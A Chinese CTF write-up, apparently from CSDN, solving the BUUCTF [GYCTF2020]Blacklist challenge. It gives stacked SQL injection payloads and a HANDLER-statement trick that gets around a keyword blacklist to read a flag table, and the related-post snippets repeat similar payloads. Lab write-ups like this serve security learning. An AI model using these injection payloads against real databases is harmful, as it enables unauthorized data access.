web:[GYCTF2020]Blacklist

已于 2023-10-31 23:58:03 修改
阅读量92 收藏
点赞数
分类专栏: BUUCTF-WEB 文章标签: 安全 web安全 网络安全 sql
于 2023-10-31 23:57:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gsumall04/article/details/134151761
版权

题目

点开靶机,页面显示为

查看源码

没有其他线索

先提交1试一下

猜测是sql注入,先测试

同时注意到url

提交为3-1,发现页面回显为空白

可以判断为字符型注入

输入select,看是否存在回显

回显了黑名单限制的关键字

但是发现没有限制关键字show,通过堆叠注入查数据库名

构造payload

1';show databases;#

判断列数

构造payload

1' order by 3#

可得有2列

获取表名

构造payload

1';show tables;

查表内数据。猜测flag在FlagHere表中

构造payload

1'; show columns from FlagHere;#

这里猜测flag在flag列中,尝试获取内容,但select被限制,可以使用handler作为查询语句

它可以通过指定的索引去访问数据,但此语法不支持DML操作

构造payload

1';HANDLER FlagHere open;HANDLER FlagHere read first;HANDLER FlagHere close;#

得到flag

参考文章链接:

BUUCTF [GYCTF2020] Blacklist_buuctf [gyctf2020]blacklist-CSDN博客

sleepywin
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF-WEB-[GYCTF2020]Blacklist
r1727337824的博客
08-29 789
<hr style=" border:solid; width:100px; height:1px;" color=#000000 size=1">
Blacklist:申请制作ENCODE黑名单
05-14
ENCODE黑名单:确定基因组的问题区域 基于高通量测序的功能基因组学检测极大地扩展了我们了解基因组的能力。 在这里,我们定义了ENCODE黑名单-人类,小鼠,蠕虫和果蝇基因组中的一组综合区域,这些区域在下一代测序...
web buuctf [GYCTF2020]Blacklist1
weixin_44214568的博客
03-18 1108
考点:堆叠注入;mysql查询语句handler 1.进行注入测试: 注入1' 提示语法错误; 注入1' or '1=1'# 返回表数据,有回显,存在字符型可注入漏洞; 2.联合查询:1' union select 1# 回显过滤 3.根据过滤事项,应该是堆叠查询 a.1'; show tables;# b.1';show columns from FlagHere;# 4.因为存在较多的过滤,利用Mysql数据库中的查询语法handler mysql除可使用se..
[GYCTF2020]Blacklist
Knsec
06-01 568
[GYCTF2020]Blacklist
BUUCTF WEB [GYCTF2020]Blacklist
Y1da的博客
04-18 240
BUUCTF WEB [GYCTF2020]Blacklist 提交1',报错 error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1 发现注入点 尝试union注入 /?inject=1' union select 1,2
buuctf-[GYCTF2020]Blacklist1(小宇特详解)
小宇的web博客
02-09 1594
buuctf-[GYCTF2020]Blacklist1(小宇特详解) 1.先看题目是一道sql注入的题目 先尝试进行闭合 payload:1’ 这里可以试出来是'来进行闭合即可 2.然后尝试着进行联合查询 发现是进行了过滤。 3.这里尝试着进行堆叠注入 payload:1’;show tables;# 4.查表 payload:1’; show columns from FlagHere;# 这里屏蔽了许多东西 5.这里由于rename,和alter被过滤了,这里考虑利用HANDLER语句 这里
[GYCTF2020]Blacklist 1
m0_62879498的博客
04-28 2450
[GYCTF2020]Blacklist 1 在做本题的时候,我们发现过滤掉了很多的关键字 很多注入方法已经没有办法使用(联合查询 布尔盲注 updataxml的报错注入) 并且发现本关的注入方法为 单引号 只能使用 堆叠注入 来进行查询查寻 库名 表名 1';show databases-- q 库名:supersqli 在这里 因为没有禁用 extractvalue 所以在这里我们可以构造出 extractvalue 报错注入 来查询库名 1' and (extractvalue(1,c
[GYCTF2020]Blacklist(堆叠注入)
记录学习,一起进步
01-19 1974
[GYCTF2020]Blacklist(堆叠注入)
[GYCTF2020]Blacklist1
c1516175954的博客
03-05 62
mysql查询语句-handler
buuctf-web-[GYCTF2020]Blacklist1
mlws1900的博客
08-11 356
MySQL 除了可以使用 select 查询表中的数据,也可使用 handler 语句,这条语句使我们能够一行一行的浏览一个表中的数据,不过handler 语句并不具备 select 语句的所有功能。它是 MySQL 专用的语句,并没有包含到SQL标准中。words表里有两个属性,即两列:id 和data,而FlagHere表里只有一个属性列,说明输入框可能查询的就是words表。换句话说我们没有办法像之前那样将 flaghere这个表改名为words(之前做过一题类似的)OPEN语句打开一个表。...
Blacklist3r:项目黑名单3r
05-30
黑名单3r 该项目的目标是积累与各种 Web 框架相关的秘密密钥/秘密材料,这些秘密密钥/秘密材料是公开可用的并可能被开发人员使用。 Blacklist3r工具将利用这些机密来审核目标应用程序并验证这些预发布密钥的用法。 ...
DISCORD.JS-BlackList-UnBlackList:卸载清单DISCORD.JS BlackListUnBlackLis命令
02-18
:information: DISCORD.JS-BlackList-UnBlackLis 将清单中的内容输入到BlackList / UnBlackList命令中。 默西·德·莱塞尔 :star: (STAR)Si Vous L'avezutilisépour votre bot。 :laptop: 代码Voici评论进口商...
Blacklist:只是一个随机黑名单
03-19
Blacklist:只是一个随机黑名单
ipset-blacklist:一个bash脚本,禁止在黑名单中发布大量IP地址
02-05
ipset-blacklist:一个bash脚本,禁止在黑名单中发布大量IP地址
数字时代网络安全即服务的兴起
网络研究观
06-11 535
网络安全即服务是一种通过基于云的服务来管理安全需求的综合方法。
如何确保数据跨域交换安全、合规、可追溯性?
最新发布
文件数据安全交换
06-14 190
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。针对上述问题,推荐采用统一的数据跨域交换管控平台,如飞驰云联《Ftrans MDE多区域文件交换系统》,帮助企业构建统一、安全、高效的数据跨域交换通道,确保数据在多地理区域、多网络区域、多分支机构间准确、高效地传输。问题:明文传输,容易被截获和窃取;
展会邀请 | 龙智即将亮相2024上海国际嵌入式展,带来安全合规、单一可信数据源、可追溯、高效协同的嵌入式开发解决方案
weixin_49715102的博客
06-09 939
凭借在DevSecOps领域的深厚积累,龙智在全球范围内遴选优秀的专业工具,为嵌入式开发行业打造了专属的嵌入式开发解决方案,并提供专业咨询、方案定制、实施部署、专业培训、定制开发等一站式服务支持。等全球专业工具,覆盖嵌入式软件单元测试、静态代码分析、需求管理、版本控制、生命周期管理及项目管理、知识库管理等领域,助力企业实现安全合规、可追溯、单一可信数据源、高效协同的嵌入式开发。并且嵌入式系统往往非常复杂,需要全面的测试覆盖、高效的测试执行,才能确保系统的可靠性和正确性,以及产品的及时交付。
安全漏洞扫描工具
weixin_45639224的博客
06-05 583
安全漏洞扫描工具
1. if blacklist and whitelist is empty: load all * 2. if blacklist is empty and whitelist non empty: assume blacklist is ["*"] * 3. if blacklist non empty: usual blacklist behavior * 4. if whitelist non empty: override blacklist
05-10
这是一些关于黑名单和白名单的规则: 1. 如果黑名单和白名单都为空,那么加载所有内容。 2. 如果黑名单为空但是白名单不为空,那么假设黑名单为 ["*"],即除了白名单中列出的内容,其他所有内容都会被屏蔽。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值